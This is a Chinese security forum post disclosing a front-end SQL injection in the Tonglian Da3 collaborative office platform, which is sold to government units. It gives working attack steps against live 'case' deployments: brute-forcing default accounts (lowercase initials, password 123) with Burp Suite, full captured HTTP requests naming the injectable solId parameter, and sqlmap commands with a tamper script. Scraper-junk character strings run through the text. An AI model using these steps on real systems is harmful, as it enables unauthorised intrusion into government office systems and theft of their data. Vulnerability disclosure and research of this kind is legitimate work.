找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1318|回复: 0
打印 上一主题 下一主题

同联Da3协同办公平台前台通用sql injection漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:15:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

3 f* s5 p0 G$ Z. }% j1 H( ~
5 Q$ K* ?/ e( ^% @

: `$ r' D$ Q' B, }; n

; o/ n. U" y6 x1 Y9 P 平台简介:, c- U1 K2 c) k% O3 J' C# ?

- {8 m& L8 O$ r6 L# p9 {

1 ]/ b9 z: y6 w F9 t/ C" E4 E% v   - _! {3 _1 Z ^3 O. }, {* x

) } l5 c0 T( E( F# h1 F

# k# F" q6 Z1 q4 ^ V 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
3 o% j' W: S7 M8 h+ a3 G/ f同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
9 B; B$ p1 O4 {% o 同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!! M- ^3 d. b( c/ z! o) A) j

) V! m- ]* ]* ?- q# r* E2 k( X

5 Z$ k) s5 y$ B2 j* H& P2 H1 D4 i5 m   : I- Q: y" `" B

9 q2 B, _: J- \7 d4 b% f _7 ?1 m

4 ^- a p7 I+ s 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:( Z7 J- M4 {; E$ D/ o( X3 x

# `# ], p+ u& g8 A4 E8 Y

. f1 k- \" u/ A4 v7 u5 T7 I   ) e0 B$ R4 S: p3 }. A; n8 E* A

( E5 I% R) y: H$ o

6 D+ G9 K" p7 U3 X- u# } http://1.1.1.1:7197/cap-aco/#(案例2-)+ a5 C( q# u/ u* n

' s0 V- ^1 F2 q4 L& S

% p8 [) n, D2 B- n http://www.XXOO.com (案例1-官网网站) - r F. M' L# h7 o& s" l

* G$ x7 f1 R! q+ e" u

% J) B# [, B( S/ a, P4 w4 {& F   9 a( ^: ]3 K5 _1 H) W# k: L, a* X

8 I+ E/ M6 f2 {. o, r( B

\3 T0 B$ ]6 s% {' m; } 漏洞详情:% |7 K- r+ M. z" w+ E" E4 E6 \

- L6 \, ^3 i% W8 \- F

1 l: S) w1 @- S- B5 D4 u8 v+ `0 m  初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试0 Q3 v8 N7 u4 X9 N

: ]2 D0 u1 V+ Z) A

8 O. Q, Y0 G# D% ?( p5 s      首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图: 0 ^, Z5 A$ ~4 E& \2 O

3 A- `# [7 y- P9 Z, M

+ U) f( G. l$ A; o- W# }/ E   0 j2 c8 s7 d+ b; U

! ^' z6 h1 d8 x

9 W" V7 s8 K, h1 F2 V( w% l   ( L& K! ~ ~3 A3 V) W; ^

+ }: M8 m/ K7 n) l: o

9 E) p6 Q3 e( u0 h% G8 ` status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下: 0 U$ i0 H9 I- ~, u# J

0 ]5 S {) a9 d% {# ^

7 P3 b+ D0 m# |1 Q( Q, ? 1、案例1-官方网站 1 L6 L5 M- y, \" i" T' F3 B" c

# Y2 G- Q D6 z k6 p

- x% I7 b( h$ k7 r GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1 " v9 ]& x9 j% r- J, H1 ^0 S) Q

7 ` H* O' H+ G" u( k

: E5 R: ^* l5 S$ E V Host: www.XXOO.com 9 i1 f0 K n C9 X' e

1 q' N Y7 Q( x% } p/ J$ }

{3 {+ h/ l2 } Proxy-Connection: Keep-Alive2 b0 o5 E6 p1 @4 F w2 F

) o2 G' |2 {/ n# h8 Y3 V6 L

9 N1 `2 _" j6 i; @4 p3 W Accept: application/json, text/javascript, */*; q=0.01 & E# ^% k- z \5 L

( b$ {/ M s* }7 P1 Q) |

0 D7 R5 w/ O' E6 E! r1 V+ I Accept-Language: zh-CN5 E" s) w z5 G# U+ }

* ?- w/ h, x: w# \+ j+ j* i

6 ]/ C3 {" x1 w% m8 `4 y Content-Type: application/json 4 _) v0 k, `3 D" K

' W+ l; f/ }9 i$ Y+ k. h! p

% t" Q: ]$ |: d! l User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko $ R& V; B; {8 ~5 E! C- P

) L& u. S% A8 Q3 _, L! C- n

4 i2 q T* Z' T* ~$ F1 F1 z X-Requested-With: XMLHttpRequest " h- y' m* q! p

* n6 V# {6 D7 N0 S) g9 l

, V, M* j/ v5 K$ t1 G# C8 ? Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002 8 I! H: @% I" I L4 u

1 K+ A* D9 x) k- i9 C$ ?1 N, r( q" x

% r; t4 z7 M8 w9 X$ y% @* Q Accept-Encoding: gzip, deflate, sdch. h! n" }0 e- o( }3 c

( I' a! w. A, O+ D- o3 |% A

# q6 @* n- D5 d% L$ l Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e : n5 V, f9 q* t1 p2 V1 \. ^: u

* q; }$ [; e }

3 i# K* }. }1 G$ i5 `9 n4 o 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:0 a, _- T" U' ?4 @; R: J

|, w( W7 ?6 G6 b& m' P6 J

7 n8 }8 N1 t/ u1 l/ O   $ t% F. k/ i, v z! R: O( }. Q1 r

# e% H3 G$ V* E- t

+ g3 E8 t8 W4 Z& \  ) _$ j B( x2 `; D$ d

( e6 t2 E0 D# S2 B1 V

G7 I# F+ o& E- f7 V$ g; G4 i( J  + R5 B9 B9 o, q0 ~# F

, C) w8 e7 ?3 {0 d* ]0 J

% A% n0 Z# |) F) O1 [  5 [0 p) Y* q0 r7 W: s

' p0 X% l. I7 o, ~) E

$ u, f$ ` m0 ]3 W n! ^* H6 P: p8 }   ! e* f, R* ^) J A: [! ^ n% l6 r

7 @) ~+ }6 S& k8 u0 P# G, {1 }

4 Y2 z, u! O: z3 X9 {0 _: B 2、案例2-某天河云平台3 Z1 x) @) X5 \4 [( [

, ^8 e9 p) ^ f& e: v

$ s! Y- |" K4 f" v, b x GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1 6 B, q1 D9 m3 o" {1 _3 b/ u8 y. k

( S( C% g b8 x2 K

- S5 S% ?& T4 I3 u- g Host: 1.1.1.:7197+ p1 [ o8 v3 f5 L( U8 N: C, P

# @0 E* v0 h# {

4 a! y; W. |- \( j5 Z' n" C8 U/ \ Accept: application/json, text/javascript, */*; q=0.01: m1 |5 q& w6 X

8 m9 o D' g+ l

2 v2 s' k9 S( B1 M8 T X-Requested-With: XMLHttpRequest1 l1 k; Y* [6 d. L. h

$ c# E9 I# Z7 h1 r6 x

; l+ n: x# W/ \. b, ]2 T7 k User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0 h s+ y+ Q- D( _3 u: Q8 v( X

4 e2 a. H/ c( s3 ?

- d% M% v2 U1 j6 K# M; x; ` Content-Type: application/json / ^( M% G) i* Z$ c* \# h2 t- Q2 M

. B( n3 O: z+ I: y- ^7 B

+ k$ _9 A0 U' ^9 N! |! \/ x Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008 * R- A3 n2 v( C

3 u( e) L+ Z3 [( i4 d( }

# ^; S8 D9 Q& l9 }3 j0 D$ b1 F Accept-Language: zh-CN,zh;q=0.8 ) y# t6 \* M8 w$ U

+ a( B( \' ~& W- l& Y

9 F% d. M5 D* u3 m Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=19 [9 B& i ^+ t) O# |" B

6 G/ B( L: P$ Y

( a7 v! @) \* @1 O: t1 E$ }4 \ Connection: close7 g: N% R' `: g$ H6 _

2 r. R- T* K# `" c

6 G. P/ J7 v& Q; A! I, Z 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图: $ `7 v2 ]' e( i: ^

' R$ a% X9 @& M3 N

4 D7 D1 T& z$ @2 G& V   2 r- W; w5 x9 C# y

) k2 E1 Y* s# E1 R6 s- @5 w( _

5 y5 K6 p; @: p" d" X N; z
! C) v# L z5 m- N$ O0 s @* N

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表